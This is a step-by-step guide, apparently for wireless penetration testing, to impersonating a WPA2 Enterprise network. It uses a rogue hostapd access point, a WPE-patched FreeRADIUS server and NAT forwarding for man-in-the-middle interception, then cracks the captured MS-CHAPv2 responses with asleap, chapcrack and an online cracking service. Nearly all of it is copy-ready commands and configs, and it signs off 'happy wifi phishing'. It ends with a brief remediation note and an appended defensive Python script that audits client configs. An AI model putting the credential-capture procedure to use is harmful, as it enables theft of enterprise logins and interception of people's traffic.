Rogue Access Point: WPA Enterprise – RADIUS Impersonation Attack

The problem with WPA2 Enterprise networks is that none of the usual WEP/WPA2 TKIP style attacks work. To get around this, Josh Wright developed a method for capturing username/password combinations from WPA2 Enterprise wireless clients using a rogue RADIUS server. The following is a guide to setting up a rogue wireless access point and RADIUS authentication server, with the end goal of capturing WPA Enterprise credentials for wireless access and more:

Start by setting up a fake AP:

apt-get install -y hostapd dnsmasq wireless-tools iw wvdial

sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd

cat > /etc/dnsmasq.conf <<EOF
log-facility=/var/log/dnsmasq.log
#address=/#/192.168.1.1
#address=/google.com/192.168.1.1
interface=wlan1
dhcp-range=192.168.1.10,192.168.1.250,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
#no-resolv
log-queries
EOF

service dnsmasq start

ifconfig wlan1 up
ifconfig wlan1 192.168.1.1/24

To forward Internet traffic through a host machine that is connected to a legitimate wifi network via eth0 (useful for man-in-the-middle interception of traffic passing through an unauthenticated access point):
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward

This is the configuration for an unauthenticated rogue AP:
cat > /etc/hostapd/hostapd.conf <<EOF
interface=wlan1
driver=nl80211
ssid=FreeWifi
channel=1
#Support for the Karma attack.
#enable_karma=1
EOF

This is the configuration for a rogue AP with WPA-EAP:
cat > /etc/hostapd/hostapd.conf <<EOF
interface=wlan1
driver=nl80211
ssid=EnterpriseWifi
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP
#Support for the Karma attack.
#enable_karma=1
EOF

Make sure your wireless dongle is plugged in, then start the access point:
iwconfig
service hostapd start


Next we need to configure a RADIUS server, but before configuring it we first need to download and modify it:

Start by downloading the server:
wget http://ftp.cc.uoc.gr/mirrors/ftp.freeradius.org/freeradius-server-2.1.12.tar.bz2
tar xfj freeradius-server-2.1.12.tar.bz2
cd freeradius-server-2.1.12

Apply the WPE patch to the RADIUS server, then build and install it:
wget http://willhackforsushi.com/code/freeradius-wpe-2.1.12.patch
patch -p1 < freeradius-wpe-2.1.12.patch
./configure && make && make install

Edit the configuration so that the access point is an allowed RADIUS client (this secret must match auth_server_shared_secret in hostapd.conf):
cat >> /usr/local/etc/raddb/clients.conf <<EOF
client 192.168.1.1 {
secret = mysecret
}
EOF


If they use domain credentials for WPA Enterprise, you will want to enable the NT domain hack in the mschap module:
nano /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes


Start the RADIUS server in the foreground with debugging output:
radiusd -X

You can view captured challenge and response pairs in a separate terminal:
tail -f /usr/local/var/log/radius/freeradius-server-wpe.log


Before you can crack the passwords, you need to convert a word list for use with the Asleap application. This can be done with genkeys, which converts the darkc0de password list into the hashed word list and index files that Asleap reads:

genkeys -r darkc0de.lst -f words.dat -n words.idx

Asleap is a tool for recovering passwords from LEAP and PPTP (MS-CHAPv2) exchanges using a password list produced by genkeys. Asleap takes the challenge and response as demonstrated below:

asleap -f words.dat -n words.idx -C 07:50:7b:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:80:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08

You can also use Asleap with a plaintext wordlist such as RockYou:

asleap -W Rockyou.txt -C 07:50:7b:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:80:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08

You can also crack any MS-CHAPv2 challenge and response in under 24 hours with the CloudCracker service. First you will need to download chapcrack from: https://github.com/moxie0/chapcrack

python chapcrack.py radius -C 07:50:7b:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:80:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08 > user.mschap

Then trim the output to just the token, which looks like this, before submitting it:
$99$eXb5DkI5RS9ng6MgpBg38g7mE52xRB2NOU4=

Then use Moxie's service at https://www.cloudcracker.com/ to crack MS-CHAPv2 (PPTP & WPA-E) in under 24 hours!


The remediation for this one is pretty straightforward. Configure clients to connect to an access point only if its RADIUS server presents a trusted, pre-installed certificate. Clients should not trust certificates signed by public certificate authorities, and if they must, they should trust only the specific root certificate authority that is required. Lastly, clients should not prompt the user when presented with an untrusted certificate, but should fail silently.
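As an added example that is not part of the original guide, the following Python script audits a wpa_supplicant.conf for the client-side settings the remediation describes, flagging WPA-EAP network blocks that lack CA pinning or a server-name match; the sample configuration, CA file path and server name in it are constructed.

```python
"""Audit wpa_supplicant.conf network blocks for WPA-EAP settings that let a
client accept a rogue RADIUS server (added example, not from the guide)."""
import re

# Constructed sample: block 1 does no server validation, block 2 pins the CA and name.
SAMPLE_CONF = """
network={
    ssid="EnterpriseWifi"
    key_mgmt=WPA-EAP
    eap=PEAP
}
network={
    ssid="EnterpriseWifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)

def parse_blocks(text):
    """Return one dict (key -> value, quotes stripped) per network={...} block."""
    blocks = []
    for body in BLOCK_RE.findall(text):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip().strip('"')
        blocks.append(entry)
    return blocks

def audit(text):
    """Return [(ssid, [problems])] for every WPA-EAP block in the config."""
    findings = []
    for b in parse_blocks(text):
        if "WPA-EAP" not in b.get("key_mgmt", ""):
            continue  # PSK and open networks are out of scope for this attack
        problems = []
        if "ca_cert" not in b:
            problems.append("no ca_cert: any server certificate is accepted")
        if "domain_suffix_match" not in b and "subject_match" not in b:
            problems.append("no server-name match: any cert from that CA is accepted")
        findings.append((b.get("ssid", "?"), problems))
    return findings
```

Run audit() over a real wpa_supplicant.conf to list every enterprise profile that would silently trust a rogue RADIUS server.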


Enjoy, and happy wifi phishing :)